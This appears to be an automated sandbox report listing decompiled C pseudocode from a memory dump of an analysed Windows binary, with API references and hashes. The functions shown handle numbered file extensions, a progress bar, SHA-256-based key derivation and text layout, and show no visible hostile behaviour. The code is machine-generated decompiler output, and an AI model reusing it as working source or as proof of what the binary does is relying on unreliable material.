                                          Download Yara Rule
                                          C-Code - Quality: 60%
                                          			E004099C9(intOrPtr* __eax, void* __edx, void* __eflags) {
				signed int _v8;
				char _v20;
				char _v32;
				char _v44;
				char _v56;
				signed int _t34;
				intOrPtr _t37;
				void* _t50;
				signed int _t57;
				signed int _t58;
				short* _t61;
				void* _t82;
				void* _t83;
				intOrPtr* _t84;
				void* _t86;

				_t84 = __eax;
				E004148C7(__eax, 0x422844);
				_t34 = E0040990C(0x41f004, _t84);
				_v8 = _t34;
				if(_t34 <= 0) {
					L8:
					return _t34 | 0xffffffff;
				}
				_t61 =  *_t84 + _t34 * 2;
				if( *_t61 != 0x2e) {
					goto L8;
				}
				 *(_t84 + 4) = _t34;
				 *_t61 = 0;
				_t37 =  *0x42276c; // 0x0
				_push(_t84);
				if(_t37 == 1) {
					_t57 = E0040990C(0x41f004);
					if(_t57 < 0) {
						L17:
						return 1;
					}
					_t82 = _t57 + _t57;
					_t44 =  *_t84 + _t82;
					if( *((short*)( *_t84 + _t82)) != 0x2e || _v8 - _t57 != 4) {
						goto L17;
					} else {
						E00414660( &_v56, 2, _t44 + 2);
						E00414803( &_v32, _v56);
						_push(_v56);
						L0041C160();
						if(E00409873( &_v32, 0x41effc) == 0) {
							_push(_v32);
							L0041C160();
							goto L17;
						}
						 *(_t84 + 4) = _t57;
						 *((short*)(_t82 +  *_t84)) = 0;
						_t50 = _t82 +  *_t84 + 2;
						__imp___wtol(_t50);
						_push(_v32);
						L15:
						_t86 = _t50;
						L0041C160();
						_t29 = _t86 + 1; // 0x1
						return _t29;
					}
				}
				_t34 = E0040990C(0x41f004);
				_t58 = _t34;
				if(_t58 <= 0) {
					goto L8;
				}
				_t83 = _t58 + _t58;
				_t34 =  *_t84 + _t83;
				if( *_t34 != 0x2e) {
					goto L8;
				}
				E00414660( &_v44, 2, _t34 + 2);
				E00414803( &_v20, _v44);
				_push(_v44);
				L0041C160();
				_t34 = E00409873( &_v20, 0x41effc);
				if(_t34 == 0) {
					_push(_v20);
					L0041C160();
					goto L8;
				}
				 *(_t84 + 4) = _t58;
				 *((short*)(_t83 +  *_t84)) = 0;
				_t50 = _t83 +  *_t84 + 2;
				__imp___wtol(_t50);
				_push(_v20);
				goto L15;
			}


















                                          0x004099d2
                                          0x004099db
                                          0x004099e8
                                          0x004099ed
                                          0x004099f2
                                          0x00409a8e
                                          0x00000000
                                          0x00409a8e
                                          0x004099fa
                                          0x00409a01
                                          0x00000000
                                          0x00000000
                                          0x00409a07
                                          0x00409a0c
                                          0x00409a0f
                                          0x00409a15
                                          0x00409a18
                                          0x00409a9b
                                          0x00409a9f
                                          0x00409b20
                                          0x00000000
                                          0x00409b22
                                          0x00409aa3
                                          0x00409aa6
                                          0x00409aac
                                          0x00000000
                                          0x00409ab8
                                          0x00409ac1
                                          0x00409acc
                                          0x00409ad1
                                          0x00409ad4
                                          0x00409ae9
                                          0x00409b17
                                          0x00409b1a
                                          0x00000000
                                          0x00409b1f
                                          0x00409aed
                                          0x00409af2
                                          0x00409af8
                                          0x00409afd
                                          0x00409b03
                                          0x00409b06
                                          0x00409b06
                                          0x00409b08
                                          0x00409b0f
                                          0x00000000
                                          0x00409b0f
                                          0x00409aac
                                          0x00409a1a
                                          0x00409a1f
                                          0x00409a23
                                          0x00000000
                                          0x00000000
                                          0x00409a27
                                          0x00409a2a
                                          0x00409a30
                                          0x00000000
                                          0x00000000
                                          0x00409a3b
                                          0x00409a46
                                          0x00409a4b
                                          0x00409a4e
                                          0x00409a5c
                                          0x00409a63
                                          0x00409a85
                                          0x00409a88
                                          0x00000000
                                          0x00409a8d
                                          0x00409a67
                                          0x00409a6c
                                          0x00409a72
                                          0x00409a77
                                          0x00409a7d
                                          0x00000000

                                          APIs
                                            • Part of subcall function 004148C7: ??2@YAPAXI@Z.MSVCRT ref: 004148EF
                                            • Part of subcall function 004148C7: ??3@YAXPAX@Z.MSVCRT ref: 004148F8
                                            • Part of subcall function 004148C7: memcpy.MSVCRT ref: 00414912
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409A4E
                                          • _wtol.MSVCRT(?,?,00000002,-00000002,?,?,00422844,00000000), ref: 00409A77
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409A88
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409AD4
                                          • _wtol.MSVCRT(?,?,00000002,-00000002,?,?,00422844,00000000), ref: 00409AFD
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409B08
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409B1A
                                            • Part of subcall function 00414660: memcpy.MSVCRT ref: 0041468E
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$memcpy$_wtol$??2@
                                          • String ID: .\/
                                          • API String ID: 211236615-1884134905
                                          • Opcode ID: fb009ff4c93d1a4d1e6f91051f7102aae8f39ca6315ff52aef816eb80003b4eb
                                          • Instruction ID: 2f426bf7fcc050e2f2ccbb6fef500bcc126e9f0fd43eeb082ec496173bf80244
                                          • Opcode Fuzzy Hash: fb009ff4c93d1a4d1e6f91051f7102aae8f39ca6315ff52aef816eb80003b4eb
                                          • Instruction Fuzzy Hash: 2D41A332A00215ABCB25EF65EC419AAB7B5FF44318710443FE452A7292EB78AC41CB5C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409D15, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 87COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E00409D15(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr* _t44;
				void* _t46;
				intOrPtr* _t48;
				void* _t49;
				void* _t52;
				WCHAR* _t71;
				intOrPtr _t74;
				void* _t77;
				void* _t79;
				void* _t80;
				void* _t82;

				_t82 = __eflags;
				_t77 = _t79 - 0x78;
				_t80 = _t79 - 0x88;
				_t52 = __ecx;
				 *((intOrPtr*)(_t77 + 0x3c)) = 0;
				 *((intOrPtr*)(_t77 + 0x44)) = 0;
				 *((intOrPtr*)(_t77 + 0x48)) = 0;
				 *((intOrPtr*)(_t77 + 0x4c)) = 0;
				 *((intOrPtr*)(_t77 + 0x50)) = 0;
				 *((intOrPtr*)(_t77 + 0x54)) = 0;
				 *((intOrPtr*)(_t77 + 0x58)) = 0;
				E004147DF(0, _t77 + 0x5c);
				_t74 = E004099C9(_t77 + 0x5c, __edx, _t82);
				if(_t74 != 0xffffffff) {
					 *((intOrPtr*)(_t77 + 0x74)) = _t74;
					E004147DF(_t36, _t77 + 0x68);
					_push(_t74);
					_t71 = L".%03u";
					while(1) {
						wsprintfW(_t77 - 0x10, _t71);
						_t80 = _t80 + 0xc;
						_t69 = _t77 + 0x5c;
						E00414864(_t77 + 0x68,  *((intOrPtr*)(E00414787(_t77 + 0x30, _t77 + 0x5c, _t77 - 0x10))));
						_push( *((intOrPtr*)(_t77 + 0x30)));
						L0041C160();
						_t44 = E00409931(_t77 + 0x3c,  *((intOrPtr*)(_t77 + 0x68)), _t77 + 0x3c);
						__eflags = _t44;
						if(_t44 != 0) {
							break;
						}
						_t46 = E00409CEB(_t77 + 0x3c, _t52 + 0x1c, _t69, _t77 + 0x3c);
						_push( *((intOrPtr*)(_t77 + 0x68)));
						L0041C160();
						_t17 = _t77 + 0x74;
						 *_t17 =  *((intOrPtr*)(_t77 + 0x74)) + 1;
						__eflags =  *_t17;
						E004147DF(_t46, _t77 + 0x68);
						_push( *((intOrPtr*)(_t77 + 0x74)));
					}
					_push( *((intOrPtr*)(_t77 + 0x68)));
					L0041C160();
					_push( *((intOrPtr*)(_t77 + 0x5c)));
					L0041C160();
					_t48 =  *((intOrPtr*)(_t77 + 0x3c));
					__eflags = _t48;
					if(_t48 != 0) {
						 *((intOrPtr*)( *_t48 + 8))(_t48);
					}
					_t49 = 1;
				} else {
					_push( *((intOrPtr*)(_t77 + 0x5c)));
					L0041C160();
					_t49 = 0;
				}
				return _t49;
			}














                                          0x00409d15
                                          0x00409d16
                                          0x00409d1a
                                          0x00409d23
                                          0x00409d29
                                          0x00409d2c
                                          0x00409d2f
                                          0x00409d32
                                          0x00409d35
                                          0x00409d38
                                          0x00409d3b
                                          0x00409d3e
                                          0x00409d4b
                                          0x00409d50
                                          0x00409d66
                                          0x00409d69
                                          0x00409d6e
                                          0x00409d75
                                          0x00409d9f
                                          0x00409da4
                                          0x00409da6
                                          0x00409dad
                                          0x00409dbd
                                          0x00409dc2
                                          0x00409dc5
                                          0x00409dd4
                                          0x00409dd9
                                          0x00409ddb
                                          0x00000000
                                          0x00000000
                                          0x00409d83
                                          0x00409d88
                                          0x00409d8b
                                          0x00409d90
                                          0x00409d90
                                          0x00409d90
                                          0x00409d97
                                          0x00409d9c
                                          0x00409d9c
                                          0x00409ddd
                                          0x00409de0
                                          0x00409de5
                                          0x00409de8
                                          0x00409ded
                                          0x00409df3
                                          0x00409df5
                                          0x00409dfa
                                          0x00409dfa
                                          0x00409dfd
                                          0x00409d52
                                          0x00409d52
                                          0x00409d55
                                          0x00409d5b
                                          0x00409d5b
                                          0x00409e05

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                            • Part of subcall function 004099C9: ??3@YAXPAX@Z.MSVCRT ref: 00409A4E
                                            • Part of subcall function 004099C9: _wtol.MSVCRT(?,?,00000002,-00000002,?,?,00422844,00000000), ref: 00409A77
                                            • Part of subcall function 004099C9: ??3@YAXPAX@Z.MSVCRT ref: 00409B08
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409D55
                                          • wsprintfW.USER32 ref: 00409DA4
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409DC5
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409DE0
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409DE8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@_wtolwsprintf
                                          • String ID: .%03u$XhV
                                          • API String ID: 2619731350-1690356812
                                          • Opcode ID: 3023bf8b89e1a29ff4447a7c58853428f1a0a35791a758db2a9123d182c47762
                                          • Instruction ID: 0034a0038c25d7715fb85f134ff920e9ad4cb3cd18a2976f835199771390e190
                                          • Opcode Fuzzy Hash: 3023bf8b89e1a29ff4447a7c58853428f1a0a35791a758db2a9123d182c47762
                                          • Instruction Fuzzy Hash: 8F313671540218AFCF04EF65DC818EE3BA9EF04314B10403BFC25922A2EB39DD86CB88
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040885E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 111windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E0040885E(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
				char _v16;
				short _v40;
				void* _t47;
				signed char _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				void* _t88;
				intOrPtr* _t90;
				void* _t91;

				_t88 = __edx;
				_t91 = __ecx;
				E004147DF(_t47,  &_v16);
				_t90 = _a4;
				if(( *(__ecx + 0x60) |  *(__ecx + 0x64)) == 0) {
					_t9 =  &_a4;
					 *_t9 = _a4 & 0x00000000;
					__eflags =  *_t9;
				} else {
					_a4 = E0041C200(E0041C2B0( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x7530, 0), _t88,  *((intOrPtr*)(_t91 + 0x60)),  *((intOrPtr*)(_t91 + 0x64)));
				}
				if(_a4 > 0x7530) {
					_a4 = 0x7530;
				}
				SendMessageW(GetDlgItem( *(_t91 + 4), 0x4b8), 0x402, _a4, 0);
				asm("cdq");
				wsprintfW( &_v40, L"%d%%", (_a4 + 0x12b) / 0x12c);
				if(( *0x42245c & 0x00000004) != 0) {
					E0040790B(GetDlgItem( *(_t91 + 4), 0x4b5),  &_v40);
				}
				_t58 =  *0x42245c; // 0x0
				if((_t58 & 0x00000002) == 0) {
					_t99 = _t58 & 0x00000001;
					if((_t58 & 0x00000001) == 0) {
						E00414864( &_v16,  &_v40);
						E00401585( &_v16, 0x20);
						_push( *0x42273c);
					} else {
						E00414864( &_v16,  *0x42273c);
						E00401585( &_v16, 0x20);
						_push( &_v40);
					}
					E00414922( &_v16);
					_t58 = E00407F52(_t91, _t99, _v16);
				}
				if( *((intOrPtr*)(_t91 + 0x70)) != 0) {
					_t59 =  *((intOrPtr*)(_t91 + 0x70));
					 *((intOrPtr*)( *_t59 + 0x28))(_t59,  *(_t91 + 4), 2);
					_t61 =  *((intOrPtr*)(_t91 + 0x70));
					_t58 =  *((intOrPtr*)( *_t61 + 0x24))(_t61,  *(_t91 + 4),  *_t90,  *((intOrPtr*)(_t90 + 4)),  *((intOrPtr*)(_t91 + 0x60)),  *((intOrPtr*)(_t91 + 0x64)));
				}
				_push(_v16);
				L0041C160();
				return _t58;
			}












                                          0x0040885e
                                          0x00408866
                                          0x0040886c
                                          0x00408877
                                          0x0040887f
                                          0x004088a0
                                          0x004088a0
                                          0x004088a0
                                          0x00408881
                                          0x0040889b
                                          0x0040889b
                                          0x004088a7
                                          0x004088a9
                                          0x004088a9
                                          0x004088c7
                                          0x004088d5
                                          0x004088e7
                                          0x004088f7
                                          0x0040890a
                                          0x0040890a
                                          0x0040890f
                                          0x00408916
                                          0x0040891b
                                          0x0040891d
                                          0x0040893e
                                          0x00408948
                                          0x0040894d
                                          0x0040891f
                                          0x00408925
                                          0x0040892f
                                          0x00408937
                                          0x00408937
                                          0x00408956
                                          0x00408960
                                          0x00408960
                                          0x00408969
                                          0x0040896b
                                          0x00408976
                                          0x0040897c
                                          0x0040898d
                                          0x0040898d
                                          0x00408990
                                          0x00408993
                                          0x0040899d

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00408896
                                            • Part of subcall function 00414864: ??2@YAPAXI@Z.MSVCRT ref: 00414896
                                            • Part of subcall function 00414864: ??3@YAXPAX@Z.MSVCRT ref: 0041489F
                                            • Part of subcall function 00414864: memcpy.MSVCRT ref: 004148B7
                                          • GetDlgItem.USER32 ref: 004088BA
                                          • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 004088C7
                                          • wsprintfW.USER32 ref: 004088E7
                                          • GetDlgItem.USER32 ref: 00408905
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00408993
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??2@??3@Item$MessageSendUnothrow_t@std@@@__ehfuncinfo$??2@memcpywsprintf
                                          • String ID: %d%%
                                          • API String ID: 3036602612-1518462796
                                          • Opcode ID: 8cfa6b19ea87e6c2df946cea92ef3935ce7be78ec6565922d45dd35d34bd56eb
                                          • Instruction ID: 432b5be96da59719ee59c1cdf104f12e765a410818bb6324a0b4774a71f17581
                                          • Opcode Fuzzy Hash: 8cfa6b19ea87e6c2df946cea92ef3935ce7be78ec6565922d45dd35d34bd56eb
                                          • Instruction Fuzzy Hash: 7C41C3B1900708BFDB11ABA0CD45EDAB7B5FF48704F10842EF682662E1DB79E951CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401368, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 89%
                                          			E00401368() {
				signed int _v8;
				signed int _v12;
				void* __ecx;
				signed int _t31;
				signed int _t33;
				signed int _t34;
				intOrPtr* _t35;
				long _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr _t41;
				signed int _t49;
				void* _t51;
				signed int _t66;
				void* _t69;
				signed int _t73;
				intOrPtr* _t74;
				void* _t77;

				_push(_t51);
				_push(_t51);
				_t69 = _t51;
				if(( *0x422774 & 0x00000040) != 0) {
					L19:
					_t31 = 0;
					L20:
					return _t31;
				}
				_t76 =  *0x422704;
				if( *0x422704 > 0) {
					goto L19;
				}
				_t77 = E00401303(_t51, _t76);
				if(_t77 == 0) {
					goto L19;
				}
				_t33 = E0040115F(_t69);
				_t66 = 4;
				_t49 = _t33;
				_t34 = _t33 * _t66;
				_push( ~(0 | _t77 > 0x00000000) | _t34);
				L0041C16C();
				_t73 = 0;
				_v12 = _t34;
				_v8 = 0;
				if(_t49 <= 0) {
					L8:
					_push(_v12);
					L0041C160();
					goto L19;
				} else {
					goto L4;
				}
				do {
					L4:
					_t35 = E00407272(_t73);
					if(_t35 != 0) {
						_t35 = _v12;
						_v8 = _v8 + 1;
						 *((intOrPtr*)(_t35 + _v8 * 4)) = _t73;
					}
					_t73 = _t73 + 1;
				} while (_t73 < _t49);
				if(_v8 != 0) {
					_push(0x14);
					L0041C16C();
					__eflags = _t35;
					if(_t35 == 0) {
						_t74 = 0;
						__eflags = 0;
					} else {
						_t74 = E00401238(_t35, _t35);
					}
					__eflags = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)( *_t74 + 4))(_t74);
					}
					_t36 = GetTickCount();
					 *(_t69 + 0x88) = _t36;
					_t37 =  *((intOrPtr*)(_t69 + 8));
					_t38 =  *((intOrPtr*)( *_t37 + 0x1c))(_t37, _v12, _v8, 0, _t74);
					__eflags = _t38;
					if(_t38 != 0) {
						L17:
						_push(_v12);
						L0041C160();
						__eflags = _t74;
						if(_t74 != 0) {
							 *((intOrPtr*)( *_t74 + 8))(_t74);
						}
						goto L19;
					} else {
						_t41 =  *((intOrPtr*)(_t74 + 0xc));
						__eflags =  *((intOrPtr*)(_t41 + 0x10));
						if( *((intOrPtr*)(_t41 + 0x10)) == 0) {
							goto L17;
						}
						L0041C160();
						 *((intOrPtr*)( *_t74 + 8))(_t74, _v12);
						_t31 = 1;
						goto L20;
					}
				}
				goto L8;
			}





















                                          0x0040136b
                                          0x0040136c
                                          0x00401377
                                          0x00401379
                                          0x00401463
                                          0x00401463
                                          0x00401465
                                          0x00401469
                                          0x00401469
                                          0x0040137f
                                          0x00401386
                                          0x00000000
                                          0x00000000
                                          0x00401391
                                          0x00401393
                                          0x00000000
                                          0x00000000
                                          0x0040139b
                                          0x004013a4
                                          0x004013a5
                                          0x004013a7
                                          0x004013b0
                                          0x004013b1
                                          0x004013b6
                                          0x004013b9
                                          0x004013bc
                                          0x004013c1
                                          0x004013e6
                                          0x004013e6
                                          0x004013e9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004013c3
                                          0x004013c3
                                          0x004013c5
                                          0x004013cc
                                          0x004013d1
                                          0x004013d4
                                          0x004013d7
                                          0x004013d7
                                          0x004013da
                                          0x004013db
                                          0x004013e4
                                          0x004013f1
                                          0x004013f3
                                          0x004013f9
                                          0x004013fb
                                          0x00401408
                                          0x00401408
                                          0x004013fd
                                          0x00401404
                                          0x00401404
                                          0x0040140a
                                          0x0040140c
                                          0x00401411
                                          0x00401411
                                          0x00401414
                                          0x0040141f
                                          0x00401425
                                          0x0040142e
                                          0x00401431
                                          0x00401433
                                          0x00401450
                                          0x00401450
                                          0x00401453
                                          0x00401459
                                          0x0040145b
                                          0x00401460
                                          0x00401460
                                          0x00000000
                                          0x00401435
                                          0x00401435
                                          0x00401438
                                          0x0040143b
                                          0x00000000
                                          0x00000000
                                          0x00401440
                                          0x00401449
                                          0x0040144c
                                          0x00000000
                                          0x0040144c
                                          0x00401433
                                          0x00000000

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@$CountTick
                                          • String ID: XhV
                                          • API String ID: 590505967-2999104372
                                          • Opcode ID: d15fb98c29bf175e0bdf4c156afd6c614612d7e43b824f00e03fa2709b660fba
                                          • Instruction ID: 003ae7c08c8171e42d60e6727e1d5df914aaf81fbeeeab4e494b2dbabceb1a0e
                                          • Opcode Fuzzy Hash: d15fb98c29bf175e0bdf4c156afd6c614612d7e43b824f00e03fa2709b660fba
                                          • Instruction Fuzzy Hash: 5831D331A00210AFCB24AFA5C8859AEB7E4EF05754B10407FF905B72B2CB788D828B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004079E9, Relevance: 12.1, APIs: 8, Instructions: 66COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004079E9(intOrPtr __ecx, WCHAR* _a4, void* _a8, void* _a12, signed int _a16) {
				struct HDC__* _v8;
				signed int _v12;
				intOrPtr _v16;
				struct HDC__* _t31;
				int _t33;
				int _t35;
				void* _t45;
				long _t47;
				long _t53;
				struct tagRECT* _t57;

				_v12 = _v12 & 0x00000000;
				_v16 = __ecx;
				_t31 = GetDC( *(__ecx + 4));
				_v8 = _t31;
				if(_t31 != 0) {
					_t33 = GetSystemMetrics(0xb);
					_t45 = 0xffffffc4;
					_t53 = _t45 - _t33 + GetSystemMetrics(0x3d);
					_t35 = GetSystemMetrics(0x3e);
					_t57 = _a8;
					_t10 = _t35 - 0x78; // -120
					_t47 = _t10;
					_t57->bottom = 0;
					_t57->top = 0;
					_t57->left = 0;
					_t57->right = _t53;
					_a8 = SelectObject(_v8, _a12);
					_v12 = 0 | DrawTextW(_v8, _a4, 0xffffffff, _t57, _a16 | 0x00000400) > 0x00000000;
					if(_t53 < _t57->right) {
						_t57->right = _t53;
					}
					if(_t47 < _t57->bottom) {
						_t57->bottom = _t47;
					}
					SelectObject(_v8, _a8);
					ReleaseDC( *(_v16 + 4), _v8);
				}
				return _v12;
			}













                                          0x004079f2
                                          0x004079f6
                                          0x004079f9
                                          0x004079ff
                                          0x00407a04
                                          0x00407a15
                                          0x00407a19
                                          0x00407a22
                                          0x00407a25
                                          0x00407a2a
                                          0x00407a30
                                          0x00407a30
                                          0x00407a35
                                          0x00407a38
                                          0x00407a3b
                                          0x00407a3d
                                          0x00407a46
                                          0x00407a68
                                          0x00407a6e
                                          0x00407a70
                                          0x00407a70
                                          0x00407a76
                                          0x00407a78
                                          0x00407a78
                                          0x00407a81
                                          0x00407a90
                                          0x00407a98
                                          0x00407a9d

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                          • String ID:
                                          • API String ID: 2466489532-0
                                          • Opcode ID: 32584a4472645db3aff27f6520096e7dc3bbedd979ffd5018345eaf338595b88
                                          • Instruction ID: d7a645f58c53ce30d97dd646464eddd9bcb9b2579cd2f157b80914e8c8c63eec
                                          • Opcode Fuzzy Hash: 32584a4472645db3aff27f6520096e7dc3bbedd979ffd5018345eaf338595b88
                                          • Instruction Fuzzy Hash: 642138B1D00209EFCB11DFA5DD84A8EBFF4EF08364F10C46AE429A62A0C735AA51DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B810, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E0040B810(intOrPtr* __ecx) {
				void* _t48;
				void* _t58;
				signed int _t59;
				void* _t60;
				void* _t61;
				void* _t64;
				void* _t73;
				intOrPtr* _t90;
				intOrPtr* _t92;
				signed int _t95;
				void* _t97;
				void* _t98;

				_t92 = __ecx;
				if( *__ecx != 0x3f) {
					_t48 =  *((intOrPtr*)(__ecx + 4)) +  *((intOrPtr*)(__ecx + 0x1c)) + 8;
					_t64 = 0;
					 *(_t97 + 0x10) = _t48;
					if(_t48 != 0) {
						_push(_t48);
						L0041C16C();
						_t97 = _t97 + 4;
						_t64 = _t48;
					}
					memcpy(_t64, _t92 + 8,  *(_t92 + 4));
					memcpy(_t64 +  *(_t92 + 4),  *(_t92 + 0x18),  *(_t92 + 0x1c));
					_t90 = _t64 +  *(_t92 + 4) +  *(_t92 + 0x1c);
					 *_t90 = 0;
					 *((intOrPtr*)(_t90 + 4)) = 0;
					_t98 = _t97 + 0x18;
					 *((intOrPtr*)(_t98 + 0x1c)) = 0x6a09e667;
					 *((intOrPtr*)(_t98 + 0x20)) = 0xbb67ae85;
					 *((intOrPtr*)(_t98 + 0x24)) = 0x3c6ef372;
					 *((intOrPtr*)(_t98 + 0x28)) = 0xa54ff53a;
					 *((intOrPtr*)(_t98 + 0x2c)) = 0x510e527f;
					 *((intOrPtr*)(_t98 + 0x30)) = 0x9b05688c;
					 *((intOrPtr*)(_t98 + 0x34)) = 0x1f83d9ab;
					 *((intOrPtr*)(_t98 + 0x38)) = 0x5be0cd19;
					 *((intOrPtr*)(_t98 + 0x3c)) = 0;
					 *((intOrPtr*)(_t98 + 0x40)) = 0;
					_t95 = E0041C2F0(1,  *_t92, 0);
					 *(_t98 + 0x18) = 0;
					do {
						E0040B350(_t98 + 0x20, _t64,  *((intOrPtr*)(_t98 + 0x10)));
						_t58 = 0;
						while(1) {
							_t41 = _t58 + _t90;
							 *_t41 =  *((char*)(_t58 + _t90)) + 1;
							if( *_t41 != 0) {
								goto L14;
							}
							_t58 = _t58 + 1;
							if(_t58 < 8) {
								continue;
							}
							goto L14;
						}
						L14:
						_t59 =  *(_t98 + 0x18);
						_t95 = _t95 + 0xffffffff;
						asm("adc eax, 0xffffffff");
						 *(_t98 + 0x18) = _t59;
					} while ((_t95 | _t59) != 0);
					_t46 = _t98 + 0x1c; // 0x6a09e667
					_t60 = E0040B600(_t46, _t92 + 0x20);
					_push(_t64);
					L0041C160();
					return _t60;
				}
				_t61 = 0;
				if( *((intOrPtr*)(__ecx + 4)) > 0) {
					do {
						 *((char*)(__ecx + _t61 + 0x20)) =  *((intOrPtr*)(__ecx + _t61 + 8));
						_t61 = _t61 + 1;
					} while (_t61 <  *((intOrPtr*)(__ecx + 4)));
				}
				_t73 = 0;
				if( *(_t92 + 0x1c) <= 0) {
					L6:
					if(_t61 >= 0x20) {
						goto L16;
					} else {
						_t14 = _t92 + 0x20; // 0x21
						return memset(_t61 + _t14, 0, 0x20 - _t61);
					}
				} else {
					while(_t61 < 0x20) {
						 *((char*)(_t61 + _t92 + 0x20)) =  *((intOrPtr*)(_t73 +  *(_t92 + 0x18)));
						_t73 = _t73 + 1;
						_t61 = _t61 + 1;
						if(_t73 <  *(_t92 + 0x1c)) {
							continue;
						} else {
							goto L6;
						}
						goto L17;
					}
					L16:
					return _t61;
				}
				L17:
			}















                                          0x0040b814
                                          0x0040b819
                                          0x0040b87e
                                          0x0040b884
                                          0x0040b887
                                          0x0040b88d
                                          0x0040b88f
                                          0x0040b890
                                          0x0040b895
                                          0x0040b898
                                          0x0040b898
                                          0x0040b8a3
                                          0x0040b8b6
                                          0x0040b8c0
                                          0x0040b8c5
                                          0x0040b8c7
                                          0x0040b8cc
                                          0x0040b8d6
                                          0x0040b8de
                                          0x0040b8e6
                                          0x0040b8ee
                                          0x0040b8f6
                                          0x0040b8fe
                                          0x0040b906
                                          0x0040b90e
                                          0x0040b916
                                          0x0040b91a
                                          0x0040b923
                                          0x0040b925
                                          0x0040b930
                                          0x0040b93b
                                          0x0040b940
                                          0x0040b942
                                          0x0040b942
                                          0x0040b942
                                          0x0040b945
                                          0x00000000
                                          0x00000000
                                          0x0040b947
                                          0x0040b94b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040b94b
                                          0x0040b94d
                                          0x0040b94d
                                          0x0040b951
                                          0x0040b954
                                          0x0040b95b
                                          0x0040b95b
                                          0x0040b964
                                          0x0040b968
                                          0x0040b96d
                                          0x0040b96e
                                          0x00000000
                                          0x0040b978
                                          0x0040b81b
                                          0x0040b820
                                          0x0040b822
                                          0x0040b826
                                          0x0040b82a
                                          0x0040b82b
